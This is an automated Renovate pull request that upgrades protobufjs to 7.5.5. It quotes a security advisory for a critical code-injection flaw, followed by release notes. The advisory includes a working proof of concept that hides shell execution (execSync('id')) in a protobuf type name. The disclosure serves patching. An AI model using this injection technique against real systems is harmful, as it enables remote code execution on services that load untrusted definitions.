fix(deps): update dependency protobufjs to v7.5.5 [security]

[renovate-bot]

This PR contains the following updates:

Package	Change	Age	Confidence
protobufjs (source)	7.4.0 → 7.5.5

GitHub Vulnerability Alerts

CVE-2026-41242

Summary

protobufjs compiles protobuf definitions into JS functions. Attackers can manipulate these definitions to execute arbitrary JS code.

Details

Attackers can inject arbitrary code in the "type" fields of protobuf definitions, which will then execute during object decoding using that definition.

PoC

const protobuf = require('protobufjs');
maliciousDescriptor = JSON.parse(`{"nested":{"User":{"fields":{"id":{"type":"int32","id":1},"data":{"type":"Data(){console.log(process.mainModule.require('child_process').execSync('id').toString())};\\nfunction X","id":2}}},"Data(){console.log(process.mainModule.require('child_process').execSync('id').toString())};\\nfunction X":{"fields":{"content":{"type":"string","id":1}}}}}`)
const root = protobuf.Root.fromJSON(maliciousDescriptor);
const UserType = root.lookupType("User");
const userBytes = Buffer.from([0x08, 0x01, 0x12, 0x07, 0x0a, 0x05, 0x68, 0x65, 0x6c, 0x6c, 0x6f]);
try {
    const user = UserType.decode(userBytes);
} catch (e) {}

Impact

Remote code execution when attackers can control the protobuf definition files.

Severity

• CVSS Score: 9.4 / 10 (Critical)
• Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

---

Release Notes

protobufjs/protobuf.js (protobufjs)

v7.5.5: v7.5.5

Compare Source

v7.5.5

This release backports two reported security issues to 7.x branch.

• fix: do not allow setting __proto__ in Message constructor (#​2126)
• fix: filter invalid characters from the type name (#​2127)

Full Changelog: protobufjs/protobuf.js@protobufjs-v7.5.4...protobufjs-v7.5.5

v7.5.4

Compare Source

Bug Fixes

• invalid syntax in descriptor.proto (#​2092) (5a3769a)

v7.5.3

Compare Source

Bug Fixes

• descriptor extensions handling post-editions (#​2075) (6e255d4)

v7.5.2

Compare Source

Bug Fixes

• ensure that types are always resolved (#​2068) (4b51cb2)

v7.5.1

Compare Source

Bug Fixes

• optimize regressions from editions implementations (#​2066) (6406d4c)
• reserved field inside group blocks fail parsing (#​2058) (56782bf)

v7.5.0

Compare Source

Features

• add Edition 2023 Support (f04ded3)
• add Edition 2023 Support (ac9a3b9)
• add Edition 2023 Support (e5ca5c8)
• add Edition 2023 Support (a84409b)
• add Edition 2023 Support (9c5a178)
• add Edition 2023 Support (b2c6867)
• add Edition 2023 Support (60f3e51)
• add Edition 2023 Support (a656361)
• add Edition 2023 Support (869a95b)
• add Edition 2023 Support (b936af4)
• add Edition 2023 Support (a938467)
• add Edition 2023 Support (1af8454)
• add Edition 2023 Support (785416f)
• add feature resolution (a9ffc8a)
• add feature resolution and tests (68b5339)
• add feature resolution for protobuf editions (547afa2)
• add feature resolution for protobuf editions (65d3ed1)
• api_converters_editions tests added and run successfully" (b4b5ca4)
• increase size of file that protobufjs CLI can process (00d5f1a)
• increase size of file that protobufjs CLI can process (d36ef0f)

Bug Fixes

• change tree traversal order and feature resolution algorithm (d2d47d9)
• remove eval usage so that chrome extension MV3 can run properly (#​1941) (f2ccb99)

---

Configuration

📅 Schedule: (UTC)

• Branch creation
  • ""
• Automerge
  • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[dpebot]

/gcbrun